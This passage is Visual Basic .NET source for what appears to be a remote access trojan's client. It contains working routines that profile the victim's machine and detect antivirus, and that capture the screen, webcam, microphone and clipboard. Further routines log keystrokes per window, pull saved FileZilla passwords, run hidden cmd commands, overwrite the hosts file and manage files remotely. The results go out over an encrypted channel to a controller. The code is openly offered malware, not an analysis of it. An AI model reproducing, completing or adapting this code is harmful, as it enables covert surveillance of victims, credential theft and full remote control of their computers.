659. Public Function HideTaskBar() As Boolean
660. Try
661. Dim lRet As Long
662. lRet = FindWindow("Shell_traywnd", "")
663. If lRet > 0 Then
664. lRet = SetWindowPos(lRet, 0, 0, 0, 0, 0, SWP_HIDEWINDOW)
665. HideTaskBar = lRet > 0
666. End If
667. Return True
668. Catch
669. Return False
670. End Try
671. End Function
672. Public Function ShowTaskBar() As Boolean
673. Try
674. Dim lRet As Long
675. lRet = FindWindow("Shell_traywnd", "")
676. If lRet > 0 Then
677. lRet = SetWindowPos(lRet, 0, 0, 0, 0, 0, SWP_SHOWWINDOW)
678. ShowTaskBar = lRet > 0
679. End If
680. Return True
681. Catch
682. Return False
683. End Try
684. End Function
685. #End Region
686. #Region "Information Gathering"
687. #Region "Get Country"
688. <DllImport("kernel32.dll")> _
689. Private Shared Function GetLocaleInfo(ByVal Locale As UInteger, ByVal LCType As UInteger, <Out()> ByVal lpLCData As System.Text.StringBuilder, ByVal cchData As Integer) As Integer
690. End Function
691.  
692. Private Const LOCALE_SYSTEM_DEFAULT As UInteger = &H400
693. Private Const LOCALE_SENGCOUNTRY As UInteger = &H1002
694.  
695. Private Shared Function GetInfo() As String
696. Dim lpLCData As Object = New System.Text.StringBuilder(256)
697. Dim ret As Integer = GetLocaleInfo(LOCALE_SYSTEM_DEFAULT, LOCALE_SENGCOUNTRY, lpLCData, lpLCData.Capacity)
698. If ret > 0 Then
699. Dim s As String = lpLCData.ToString().Substring(0, ret - 1)
700. Return UCase(s.Substring(0, 3))
701. End If
702. Return String.Empty
703. End Function
704. #End Region
705. Public Function getpriv() As String
706. Try
707. My.User.InitializeWithWindowsUser()
708.  
709. If My.User.IsAuthenticated() Then
710. If My.User.IsInRole(ApplicationServices.BuiltInRole.Administrator) Then
711. Return "Admin"
712. ElseIf My.User.IsInRole(ApplicationServices.BuiltInRole.User) Then
713. Return "User"
714. ElseIf My.User.IsInRole(ApplicationServices.BuiltInRole.Guest) Then
715. Return "Guest"
716. Else
717. Return "Unknown"
718. End If
719. End If
720. Return "Unknown"
721. Catch
722. Return "Unknown"
723. End Try
724. End Function
725. Sub sendprocess()
726. Dim p As New System.Diagnostics.Process()
727. Dim count As Integer = 0
728. Dim Listview1 As New ListView
729. For Each p In System.Diagnostics.Process.GetProcesses(My.Computer.Name)
730. On Error Resume Next
731. Listview1.Items.Add(p.ProcessName & ".exe")
732. Listview1.Items(count).SubItems.Add(FormatNumber(Math.Round(p.PrivateMemorySize64 / 1024), 0) & " K")
733. Listview1.Items(count).SubItems.Add(p.Responding)
734. Listview1.Items(count).SubItems.Add(p.StartTime.ToString().Trim)
735. Listview1.Items(count).SubItems.Add(p.Id)
736. count += 1
737. Next
738.  
739. Dim Items As String = ""
740. For Each item As ListViewItem In Listview1.Items
741. Items = Items & item.Text & "|" & item.SubItems(1).Text & "|" & item.SubItems(2).Text & "|" & item.SubItems(3).Text & "|" & item.SubItems(4).Text & vbNewLine
742. Next
743. Items = Items.Trim
744.  
745. Send(AES_Encrypt("GetProcess" & Items, enckey))
746. End Sub
747. Sub getinstalledsoftware()
748. Try
749.  
750. Dim regkey, subkey As Microsoft.Win32.RegistryKey
751. Dim value As String
752. Dim regpath As String = "Software\Microsoft\Windows\CurrentVersion\Uninstall"
753. Dim software As String = String.Empty
754. Dim softwarecount As Integer
755.  
756. regkey = My.Computer.Registry.LocalMachine.OpenSubKey(regpath)
757. Dim subkeys() As String = regkey.GetSubKeyNames
758. Dim includes As Boolean
759. For Each subk As String In subkeys
760. subkey = regkey.OpenSubKey(subk)
761. value = subkey.GetValue("DisplayName", "")
762. If value <> "" Then
763. includes = True
764. If value.IndexOf("Hotfix") <> -1 Then includes = False
765. If value.IndexOf("Security Update") <> -1 Then includes = False
766. If value.IndexOf("Update for") <> -1 Then includes = False
767. If includes = True Then
768. software += value & "|" & vbCrLf
769. softwarecount += 1
770. End If
771. End If
772. Next
773.  
774. Dim final As String = "Software|" & softwarecount & "|" & software
775. Send(AES_Encrypt(final, enckey))
776. Catch
777. End Try
778. End Sub
779. #Region "System Information"
780. Function getsystem() As String
781. Try
782. Return SystemInformation.ComputerName.ToString() & "|" & _
783. SystemInformation.UserName.ToString() & "|" & _
784. SystemInformation.VirtualScreen.Width & "|" & _
785. SystemInformation.VirtualScreen.Height & "|" & _
786. FormatNumber(My.Computer.Info.AvailablePhysicalMemory / 1024 / 1024 / 1024, 2) & " GB|" & _
787. FormatNumber(My.Computer.Info.AvailableVirtualMemory / 1024 / 1024 / 1024, 2) & " GB|" & _
788. My.Computer.Info.OSFullName & "|" & _
789. My.Computer.Info.OSPlatform & "|" & _
790. My.Computer.Info.OSVersion & "|" & _
791. FormatNumber(My.Computer.Info.TotalPhysicalMemory / 1024 / 1024 / 1024, 2) & " GB|" & _
792. FormatNumber(My.Computer.Info.TotalVirtualMemory / 1024 / 1024 / 1024, 2) & " GB|" & _
793. SystemInformation.PowerStatus.BatteryChargeStatus.ToString() & "|" & _
794. SystemInformation.PowerStatus.BatteryFullLifetime.ToString() & "|" & _
795. SystemInformation.PowerStatus.BatteryLifePercent.ToString() & "|" & _
796. SystemInformation.PowerStatus.BatteryLifeRemaining.ToString() & "|" & _
797. GetCPUInfo() & "|" & GetGPUName() & "|" & _
798. "(Started: " & StartUp() & ") & (Uptime: " & getUptime() & ")"
799. Catch
800. Return "N/A"
801. End Try
802. End Function
803. Private Function StartUp() As String
804. Try
805. Dim StartDate As DateTime
806. Dim envTicks As Long = Environment.TickCount
807. Dim msToAdd As Long = envTicks - (envTicks * 2)
808. StartDate = DateTime.Now.AddMilliseconds(msToAdd)
809. Return StartDate.ToString
810. Catch
811. Return Nothing
812. End Try
813. End Function
814. Public Function getUptime() As String
815. Try
816. Dim time As String = String.Empty
817. time += Math.Round(Environment.TickCount / 86400000) & " days, "
818. time += Math.Round(Environment.TickCount / 3600000 Mod 24) & " hours, "
819. time += Math.Round(Environment.TickCount / 120000 Mod 60) & " minutes, "
820. time += Math.Round(Environment.TickCount / 1000 Mod 60) & " seconds."
821. Return time
822. Catch
823. Return Nothing
824. End Try
825. End Function
826. Private Function GetCPUInfo() As String
827. Try
828. Dim cpuName As String = Microsoft.Win32.Registry.LocalMachine.OpenSubKey("HARDWARE\DESCRIPTION\System\CentralProcessor\0").GetValue("ProcessorNameString")
829. Return cpuName.Replace(" ", " ").Replace(" ", " ")
830. Catch
831. Return Nothing
832. End Try
833. End Function
834. Private Function GetGPUName() As String
835. Dim GraphicsCardName As String = String.Empty
836. Try
837. Dim WmiSelect As New ManagementObjectSearcher _
838. ("root\CIMV2", "SELECT * FROM Win32_VideoController")
839. For Each WmiResults As ManagementObject In WmiSelect.Get()
840. GraphicsCardName = WmiResults.GetPropertyValue("Name").ToString
841. If (Not String.IsNullOrEmpty(GraphicsCardName)) Then
842. Exit For
843. End If
844. Next
845. Catch err As ManagementException
846. End Try
847. Return GraphicsCardName
848. End Function
849. #End Region
850. #Region "Deep Information"
851. Function GetDeepInfo() As String
852. Try
853. Dim devices As String = String.Empty
854.  
855. Dim strName As String = Space(100)
856. Dim strVer As String = Space(100)
857. Dim bReturn As Boolean
858. Dim x As Integer = 0
859. Do
860. bReturn = capGetDriverDescriptionA(x, strName, 100, strVer, 100)
861. If bReturn Then devices += strName.Trim & "|"
862. x += 1
863. Loop Until bReturn = False
864.  
865. Dim res As String = String.Empty
866. If devices <> "" Then
867. res = "Yes" : Else : res = "No"
868. End If
869.  
870. Return "|" & My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion", "RegisteredOwner", "N/A") & "|" & _
871. My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion", "RegisteredOrganization", "N/A") & "|" & _
872. My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Win8", "ProductKey", "N/A") & "|" & NetworkInterface.GetAllNetworkInterfaces()(0).GetPhysicalAddress().ToString & "|" & _
873. res & "|" & GetAV() & "|" & Application.ExecutablePath
874. Catch
875. Return ""
876. End Try
877. End Function
878. Function GetAV() As String
879. Dim wmiQuery As Object = "Select * From AntiVirusProduct"
880. Dim objWMIService As Object = GetObject("winmgmts:\\.\root\SecurityCenter2")
881. Dim colItems As Object = objWMIService.ExecQuery(wmiQuery)
882. For Each objItem As Object In colItems
883. On Error Resume Next
884. Return objItem.displayName.ToString()
885. Next
886. Return Nothing
887. End Function
888. #End Region
889. Function GetTCPConnections() As String
890. Try
891. Dim s As String = String.Empty
892.  
893. Dim properties As IPGlobalProperties = IPGlobalProperties.GetIPGlobalProperties()
894. Dim connections() As TcpConnectionInformation = properties.GetActiveTcpConnections()
895.  
896. For Each c As TcpConnectionInformation In connections
897. s += String.Format("{0}|{1}|{2}", c.LocalEndPoint, c.RemoteEndPoint, c.State) & vbCrLf
898. Next
899.  
900. Return s.Trim
901. Catch
902. Return Nothing
903. End Try
904. End Function
905. Private Sub GetStartupEntries()
906. Try
907. Dim x As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup)
908.  
909. Dim dir As DirectoryInfo = New DirectoryInfo(x)
910. Dim files() As FileInfo = dir.GetFiles
911.  
912. Dim regkeys(3) As RegistryKey
913.  
914. regkeys(0) = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run")
915. regkeys(1) = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\RunOnce")
916. regkeys(2) = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run")
917. regkeys(3) = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\RunOnce")
918.  
919. Dim result As String = String.Empty
920.  
921. For Each File As FileInfo In files
922. result += String.Format("{0}|{1}|{2}", x, File.Name, x & "\" & File.Name) & vbCrLf
923. Next
924.  
925. For i As Integer = 0 To 3
926. For Each valueName As String In regkeys(i).GetValueNames()
927. result += String.Format("{0}|{1}|{2}", regkeys(i).ToString, valueName, regkeys(i).GetValue(valueName)) & vbCrLf
928. Next
929. Next
930.  
931. result = result.Trim
932. Send(AES_Encrypt("Strtp" & result, enckey))
933. Catch
934. End Try
935. End Sub
936. Sub SendServices()
937. Dim Listview1 As New ListView
938. Dim scServices() As ServiceController = ServiceController.GetServices()
939.  
940. For i As Integer = 0 To UBound(scServices)
941. With ListView1.Items.Add(scServices(i).ServiceName)
942. .SubItems.Add(scServices(i).DisplayName)
943. .SubItems.Add(scServices(i).ServiceType.ToString)
944. .SubItems.Add(scServices(i).Status.ToString)
945. End With
946. Next
947.  
948. Dim Items As String = ""
949. For Each item As ListViewItem In Listview1.Items
950. Items = Items & item.Text & "|" & item.SubItems(1).Text & "|" & item.SubItems(2).Text & "|" & item.SubItems(3).Text & vbNewLine
951. Next
952. Items = Items.Trim
953.  
954. Send(AES_Encrypt("Services" & Items, enckey))
955. End Sub
956. Sub PerformServiceAction(Byval number As Integer, Byval Action As String)
957. Try
958. Dim scServices() As ServiceController = ServiceController.GetServices()
959. Select Case Action
960. Case "Close"
961. scServices(number).Close()
962. Case "Continue"
963. scServices(number).Continue()
964. Case "Pause"
965. scServices(number).Pause()
966. Case "Start"
967. scServices(number).Start()
968. Case "Stop"
969. scServices(number).Stop()
970. End Select
971. Catch : End Try
972. End Sub
973. #End Region
974. #Region "Encryption"
975. Public Function AES_Encrypt(ByVal input As String, ByVal pass As String) As String
976. Dim AES As New System.Security.Cryptography.RijndaelManaged
977. Dim Hash_AES As New System.Security.Cryptography.MD5CryptoServiceProvider
978. Dim encrypted As String = ""
979. Try
980. Dim hash(31) As Byte
981. Dim temp As Byte() = Hash_AES.ComputeHash(System.Text.ASCIIEncoding.ASCII.GetBytes(pass))
982. Array.Copy(temp, 0, hash, 0, 16)
983. Array.Copy(temp, 0, hash, 15, 16)
984. AES.Key = hash
985. AES.Mode = System.Security.Cryptography.CipherMode.ECB
986. Dim DESEncrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateEncryptor
987. Dim Buffer As Byte() = System.Text.ASCIIEncoding.ASCII.GetBytes(input)
988. encrypted = Convert.ToBase64String(DESEncrypter.TransformFinalBlock(Buffer, 0, Buffer.Length))
989. Return encrypted
990. Catch
991. Return Nothing
992. End Try
993. End Function
994. Public Function AES_Decrypt(ByVal input As String, ByVal pass As String) As String
995. Dim AES As New System.Security.Cryptography.RijndaelManaged
996. Dim Hash_AES As New System.Security.Cryptography.MD5CryptoServiceProvider
997. Dim decrypted As String = ""
998. Try
999. Dim hash(31) As Byte
1000. Dim temp As Byte() = Hash_AES.ComputeHash(System.Text.ASCIIEncoding.ASCII.GetBytes(pass))
1001. Array.Copy(temp, 0, hash, 0, 16)
1002. Array.Copy(temp, 0, hash, 15, 16)
1003. AES.Key = hash
1004. AES.Mode = System.Security.Cryptography.CipherMode.ECB
1005. Dim DESDecrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateDecryptor
1006. Dim Buffer As Byte() = Convert.FromBase64String(input)
1007. decrypted = System.Text.ASCIIEncoding.ASCII.GetString(DESDecrypter.TransformFinalBlock(Buffer, 0, Buffer.Length))
1008. Return decrypted
1009. Catch
1010. Return Nothing
1011. End Try
1012. End Function
1013. #End Region
1014. #Region "Surveillance"
1015. #Region "Remote Desktop"
1016. Sub sendscreen()
1017. Try
1018.  
1019. Dim width As Integer = res.Split("x")(0)
1020. Dim height As Integer = res.Split("x")(1)
1021.  
1022. Dim b As New System.Drawing.Bitmap(My.Computer.Screen.Bounds.Width, My.Computer.Screen.Bounds.Height)
1023. Dim g As System.Drawing.Graphics = System.Drawing.Graphics.FromImage(b)
1024. g.CopyFromScreen(0, 0, 0, 0, b.Size)
1025. g.Dispose()
1026.  
1027. Dim p, pp As New PictureBox
1028. p.Image = b
1029. Dim img As System.Drawing.Image = p.Image
1030. pp.Image = img.GetThumbnailImage(width, height, Nothing, Nothing)
1031. Dim img2 As System.Drawing.Image = pp.Image
1032.  
1033. Dim bmp1 As New System.Drawing.Bitmap(img2)
1034. Dim jgpEncoder As System.Drawing.Imaging.ImageCodecInfo = GetEncoder(System.Drawing.Imaging.ImageFormat.Jpeg)
1035. Dim myEncoder As System.Drawing.Imaging.Encoder = System.Drawing.Imaging.Encoder.Quality
1036. Dim myEncoderParameters As New System.Drawing.Imaging.EncoderParameters(1)
1037. Dim myEncoderParameter As New System.Drawing.Imaging.EncoderParameter(myEncoder, comp)
1038. myEncoderParameters.Param(0) = myEncoderParameter
1039. bmp1.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\scr.jpg", jgpEncoder, myEncoderParameters)
1040. Send(AES_Encrypt("RemoteDesktop" & Convert.ToBase64String(IO.File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\scr.jpg")), enckey))
1041. IO.File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\scr.jpg")
1042. Catch
1043. End Try
1044. End Sub
1045. Private Function GetEncoder(ByVal format As System.Drawing.Imaging.ImageFormat) As System.Drawing.Imaging.ImageCodecInfo
1046. Try
1047. Dim codecs As System.Drawing.Imaging.ImageCodecInfo() = System.Drawing.Imaging.ImageCodecInfo.GetImageDecoders()
1048. Dim codec As System.Drawing.Imaging.ImageCodecInfo
1049. For Each codec In codecs
1050. If codec.FormatID = format.Guid Then
1051. Return codec
1052. End If
1053. Next codec
1054. Return Nothing
1055. Catch
1056. Return Nothing
1057. End Try
1058. End Function
1059. #End Region
1060. Sub MouseMov(ByVal txt As String)
1061. Try
1062. If txt.StartsWith("Left") Then
1063. Dim x As Integer = txt.Replace("LeftSetCurPos", "").Split("x")(0)
1064. Dim y As Integer = txt.Replace("LeftSetCurPos", "").Split("x")(1)
1065.  
1066. SetCursorPos(x, y)
1067. mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
1068. mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)
1069. ElseIf txt.StartsWith("Right") Then
1070. Dim x As Integer = txt.Replace("RightSetCurPos", "").Split("x")(0)
1071. Dim y As Integer = txt.Replace("RightSetCurPos", "").Split("x")(1)
1072.  
1073. SetCursorPos(x, y)
1074. mouse_event(MOUSEEVENTF_RIGHTDOWN, 0, 0, 0, 0)
1075. mouse_event(MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0)
1076. End If
1077. Catch
1078. End Try
1079. End Sub
1080. #Region "Audio"
1081. Sub audio_start()
1082. Try
1083. Dim i As Integer
1084. i = mciSendString("open new type waveaudio alias capture", Nothing, 0, 0)
1085. i = mciSendString("record capture", Nothing, 0, 0)
1086. Catch
1087. End Try
1088. End Sub
1089. Sub audio_stop()
1090. Try
1091. Dim i As Integer
1092. i = mciSendString("save capture " & My.Computer.FileSystem.SpecialDirectories.Temp.ToString & "\rec.wav", Nothing, 0, 0)
1093. i = mciSendString("close capture", Nothing, 0, 0)
1094. Catch
1095. End Try
1096. End Sub
1097. Sub audio_get()
1098. Try
1099. Send(AES_Encrypt("RecordingFile" & SystemInformation.ComputerName & "|" & Convert.ToBase64String(File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\rec.wav")), enckey))
1100. File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\rec.wav")
1101. Catch
1102. End Try
1103. End Sub
1104. #End Region
1105. #Region "Webcam"
1106. Sub listdevices()
1107. Try
1108. Dim devices As String = String.Empty
1109.  
1110. Dim strName As String = Space(100)
1111. Dim strVer As String = Space(100)
1112. Dim bReturn As Boolean
1113. Dim x As Integer = 0
1114. Do
1115. bReturn = capGetDriverDescriptionA(x, strName, 100, strVer, 100)
1116. If bReturn Then devices += strName.Trim & "|"
1117. x += 1
1118. Loop Until bReturn = False
1119. Send(AES_Encrypt("WebcamDevices" & devices, enckey))
1120. Catch
1121. End Try
1122. End Sub
1123. Sub getwebcam()
1124. Try
1125. Dim iHeight As Integer = picCapture.Height
1126. Dim iWidth As Integer = picCapture.Width
1127. hHwnd = capCreateCaptureWindowA(iDevice, WS_VISIBLE Or WS_CHILD, 0, 0, 640, 480, picCapture.Handle.ToInt32, 0)
1128.  
1129. If SendWebcam(hHwnd, WM_CAP_DRIVER_CONNECT, iDevice, 0) Then
1130. SendWebcam(hHwnd, WM_CAP_SET_SCALE, True, 0)
1131. SendWebcam(hHwnd, WM_CAP_SET_PREVIEWRATE, 66, 0)
1132. SendWebcam(hHwnd, WM_CAP_SET_PREVIEW, True, 0)
1133. SetWebcamPos(hHwnd, HWND_BOTTOM, 0, 0, picCapture.Width, picCapture.Height, SWP_NOMOVE Or SWP_NOZORDER)
1134.  
1135. Dim data As IDataObject
1136. Dim bmap As System.Drawing.Image
1137. SendWebcam(hHwnd, WM_CAP_EDIT_COPY, 0, 0)
1138. data = Clipboard.GetDataObject()
1139. If data.GetDataPresent(GetType(System.Drawing.Bitmap)) Then
1140. bmap = CType(data.GetData(GetType(System.Drawing.Bitmap)), System.Drawing.Image)
1141. picCapture.Image = bmap
1142.  
1143. SendWebcam(hHwnd, WM_CAP_DRIVER_DISCONNECT, iDevice, 0)
1144.  
1145. bmap.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\wcs.png", System.Drawing.Imaging.ImageFormat.Png)
1146. Send(AES_Encrypt("WebcamSnap" & Convert.ToBase64String(IO.File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\wcs.png")), enckey))
1147. IO.File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\wcs.png")
1148. End If
1149. Else
1150. DestroyWebcam(hHwnd)
1151. End If
1152. Catch
1153. End Try
1154. End Sub
1155. #End Region
1156. Sub SendThumbNail()
1157. Try
1158.  
1159. Dim b As New System.Drawing.Bitmap(My.Computer.Screen.Bounds.Width, My.Computer.Screen.Bounds.Height)
1160. Dim g As System.Drawing.Graphics = System.Drawing.Graphics.FromImage(b)
1161. g.CopyFromScreen(0, 0, 0, 0, b.Size)
1162. g.Dispose()
1163.  
1164. Dim p, pp As New PictureBox
1165. p.Image = b
1166. Dim img As System.Drawing.Image = p.Image
1167. pp.Image = img.GetThumbnailImage(242, 152, Nothing, Nothing)
1168. Dim img2 As System.Drawing.Image = pp.Image
1169.  
1170. Dim bmp1 As New System.Drawing.Bitmap(img2)
1171. Dim jgpEncoder As System.Drawing.Imaging.ImageCodecInfo = GetEncoder(System.Drawing.Imaging.ImageFormat.Jpeg)
1172. Dim myEncoder As System.Drawing.Imaging.Encoder = System.Drawing.Imaging.Encoder.Quality
1173. Dim myEncoderParameters As New System.Drawing.Imaging.EncoderParameters(1)
1174. Dim myEncoderParameter As New System.Drawing.Imaging.EncoderParameter(myEncoder, 100L)
1175. myEncoderParameters.Param(0) = myEncoderParameter
1176. bmp1.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\thumb.jpg", jgpEncoder, myEncoderParameters)
1177. Send(AES_Encrypt("ThumbNail" & Convert.ToBase64String(IO.File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\thumb.jpg")), enckey))
1178. IO.File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\thumb.jpg")
1179. Catch
1180. End Try
1181. End Sub
1182. #End Region
1183. #Region "Miscellaneous"
1184. Sub loadhostsfile()
1185. Try
1186. Send(AES_Encrypt("HostsFile" & IO.File.ReadAllText("C:\Windows\system32\drivers\etc\hosts"), enckey))
1187. Catch
1188. End Try
1189. End Sub
1190. Sub savehostsfile(ByVal txt As String)
1191. Try
1192. IO.File.WriteAllText("C:\Windows\system32\drivers\etc\hosts", txt)
1193. Catch
1194. End Try
1195. End Sub
1196. Sub getclipboardimage()
1197. Try
1198. If My.Computer.Clipboard.ContainsImage() Then
1199. Dim img As New PictureBox
1200. img.Image = My.Computer.Clipboard.GetImage()
1201. img.Image.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\cp.jpg")
1202. Else
1203. Dim Bmp As New System.Drawing.Bitmap(397, 187, Imaging.PixelFormat.Format32bppPArgb)
1204. Bmp.SetResolution(397, 187)
1205. Dim G As System.Drawing.Graphics = Graphics.FromImage(Bmp)
1206. G.Clear(Color.White)
1207. G.InterpolationMode = Drawing2D.InterpolationMode.HighQualityBicubic
1208. G.SmoothingMode = Drawing2D.SmoothingMode.AntiAlias
1209. G.TextRenderingHint = Drawing.Text.TextRenderingHint.AntiAlias
1210. Dim F As New Font("Arial", 3)
1211. Dim B As New SolidBrush(Color.Red)
1212. G.DrawString("The Clipboard does not have any Images!", F, B, 12, 12)
1213.  
1214. Bmp.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\cp.jpg")
1215. End If
1216.  
1217. Send(AES_Encrypt("CPImage" & Convert.ToBase64String(IO.File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\cp.jpg")), enckey))
1218. IO.File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\cp.jpg")
1219. Catch
1220. End Try
1221. End Sub
1222. Sub getclipboardtext()
1223. Try
1224. If My.Computer.Clipboard.ContainsText() = True Then
1225. Send(AES_Encrypt("CPText" & My.Computer.Clipboard.GetText(), enckey))
1226. End If
1227. Catch
1228. End Try
1229. End Sub
1230. Sub setclipboardtext(ByVal text As String)
1231. Try
1232. My.Computer.Clipboard.SetText(text)
1233. Catch
1234. End Try
1235. End Sub
1236. Sub runshell(cmd As String)
1237. Try
1238. Dim p As New System.Diagnostics.Process
1239. Dim i As New System.Diagnostics.ProcessStartInfo("cmd")
1240. i.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
1241. i.Arguments = "/C " & cmd
1242. i.RedirectStandardOutput = True
1243. i.UseShellExecute = False
1244. i.CreateNoWindow = True
1245. i.ErrorDialog = False
1246. p.StartInfo = i
1247. p.Start()
1248. Dim output As String = p.StandardOutput.ReadToEnd
1249.  
1250. Send(AES_Encrypt("Shell" & output, enckey))
1251. Catch
1252. End Try
1253. End Sub
1254. #End Region
1255. #Region "Keylogger"
1256. Private Function GetActiveWindowTitle() As String
1257. Dim MyStr As String
1258. MyStr = New String(Chr(0), 100)
1259. GetWindowText(GetForegroundWindow, MyStr, 100)
1260. MyStr = MyStr.Substring(0, InStr(MyStr, Chr(0)) - 1)
1261. Return MyStr
1262. End Function
1263. Private Sub logger_Down(Key As String) Handles logger.Down
1264. Call APPU()
1265. logs &= Key
1266. End Sub
1267. Sub APPU()
1268. If strin <> GetActiveWindowTitle() Then
1269. logs = logs & vbCrLf & vbCrLf & "[" & My.Computer.Clock.LocalTime.Date & " " & My.Computer.Clock.LocalTime.Hour & ":" & My.Computer.Clock.LocalTime.Minute & ":" & My.Computer.Clock.LocalTime.Second & " | " & GetActiveWindowTitle() & "]" + vbNewLine & vbNewLine
1270. strin = GetActiveWindowTitle()
1271. End If
1272. End Sub
1273. #End Region
1274. Function FileZilla() As Object
1275. Try
1276. Dim O As String() = Split(IO.File.ReadAllText(Environ("APPDATA") & "\FileZilla\recentservers.xml"), "<Server>")
1277. Dim OL As String = Nothing
1278.  
1279. For Each u As String In O
1280. Dim UU() As String = Split(u, vbNewLine)
1281. For Each I As String In UU
1282. If I.Contains("<Host>") Then
1283. OL += Split(Split(I, "<Host>")(1), "</Host>")(0)
1284. End If
1285. If I.Contains("<Port>") Then
1286. OL += ":" & Split(Split(I, "<Port>")(1), "</Port>")(0) & "|FileZilla"
1287. End If
1288. If I.Contains("<User>") Then
1289. OL += "|" & Split(Split(I, "<User>")(1), "</User>")(0)
1290. End If
1291. If I.Contains("<Pass>") Then
1292. OL += "|" & Split(Split(I, "<Pass>")(1), "</Pass>")(0) & vbCrLf
1293. End If
1294. Next
1295. Next
1296. Return OL
1297. Catch
1298. Return ""
1299. End Try
1300. End Function
1301. #Region "FileManager"
1302. Sub listdrives()
1303. Try
1304. Dim drives As String = String.Empty
1305. For Each drive As IO.DriveInfo In IO.DriveInfo.GetDrives
1306. Dim ltr As String = drive.Name
1307. If drive.IsReady AndAlso drive.VolumeLabel <> "" Then
1308. Else
1309. End If
1310. drives += ltr & "|"
1311. Next
1312. Send(AES_Encrypt("Drives" & drives, enckey))
1313. Catch
1314. End Try
1315. End Sub
1316. Sub showfiles(path As String)
1317. Try
1318. listviewfiles.Items.Clear()
1319. curntdir2 = ""
1320. For Each Dir As String In Directory.GetDirectories(path)
1321. Dir = Dir.Replace(path, "")
1322. Dim d As New DirectoryInfo(path & Dir & "\")
1323. With listviewfiles.Items.Add(Dir, 0)
1324. .SubItems.Add(d.CreationTime)
1325. .SubItems.Add(d.LastAccessTime)
1326. .SubItems.Add("")
1327. .SubItems.Add("1")
1328. End With
1329. Next
1330.  
1331. Dim file As String
1332. file = Dir$(path)
1333. Do While Len(file)
1334. Dim f As New FileInfo(path & file)
1335. With listviewfiles.Items.Add(file)
1336. .SubItems.Add(f.CreationTime)
1337. .SubItems.Add(f.LastAccessTime)
1338. .SubItems.Add(Format((f.Length / 1024) / 1024, "###,###,##0.00") & " MB")
1339. .SubItems.Add("0")
1340. End With
1341. file = Dir$()
1342. Loop
1343. curntdir2 = path
1344.  
1345. Dim Items As String = curntdir2 & "|"
1346. For Each item As ListViewItem In listviewfiles.Items
1347. Items = Items & item.Text & "|" & item.SubItems(1).Text & "|" & item.SubItems(2).Text & "|" & item.SubItems(3).Text & "|" & item.SubItems(4).Text & vbNewLine
1348. Next
1349. Items = Items.Trim
1350.  
1351. Send(AES_Encrypt("FileManagerFiles" & Items, enckey))
1352. Catch
1353. End Try
1354. End Sub
1355. Sub createnewdirectory(ByVal path As String)
1356. Try
1357. My.Computer.FileSystem.CreateDirectory(path)
1358. Catch
1359. End Try
1360. End Sub
1361. Sub deletedirectory(ByVal path As String)
1362. Try
1363. My.Computer.FileSystem.DeleteDirectory(path, FileIO.DeleteDirectoryOption.DeleteAllContents)
1364. Catch
1365. End Try
1366. End Sub
1367. Sub renamedirectory(ByVal path As String, ByVal newname As String)
1368. Try
1369. My.Computer.FileSystem.RenameDirectory(path, newname)
1370. Catch
1371. End Try
1372. End Sub
1373. Sub movedirectory(ByVal oldpath As String, ByVal newpath As String, ByVal name As String)
1374. Try
1375. My.Computer.FileSystem.MoveDirectory(oldpath, newpath & name, True)
1376. Catch
1377. End Try
1378. End Sub
1379. Sub copydirectory(ByVal oldpath As String, ByVal newpath As String, ByVal name As String)
1380. Try
1381. My.Computer.FileSystem.CopyDirectory(oldpath, newpath & name, True)
1382. Catch
1383. End Try
1384. End Sub
1385. Sub CreateNewFile(ByVal txt As String)
1386. Try
1387. txt = txt.Replace("mkfile", "")
1388. Dim path As String = txt.Split("|")(0)
1389. Dim content As String = txt.Split("|")(1)
1390. IO.File.WriteAllText(path, content)
1391. Catch
1392. End Try
1393. End Sub
1394. Sub deletefile(ByVal path As String)
1395. Try
1396. My.Computer.FileSystem.DeleteFile(path, FileIO.UIOption.OnlyErrorDialogs, FileIO.RecycleOption.DeletePermanently)
1397. Catch
1398. End Try
1399. End Sub
1400. Sub renamefile(ByVal path As String, ByVal newname As String)
1401. Try
1402. My.Computer.FileSystem.RenameFile(path, newname)
1403. Catch
1404. End Try
1405. End Sub
1406. Sub movefile(ByVal oldpath As String, ByVal newpath As String, ByVal name As String)
1407. Try
1408. My.Computer.FileSystem.MoveFile(oldpath, newpath & name, True)
1409. Catch
1410. End Try
1411. End Sub
1412. Sub copyfile(ByVal oldpath As String, ByVal newpath As String, ByVal name As String)
1413. Try
1414. My.Computer.FileSystem.CopyFile(oldpath, newpath & name, True)
1415. Catch
1416. End Try
1417. End Sub
1418. Sub sharefile(ByVal filepath As String)
1419. Dim file As String = Convert.ToBase64String(IO.File.ReadAllBytes(filepath))
1420. Send(AES_Encrypt("IncomingFile" & file, enckey))
1421. End Sub
1422. #End Region
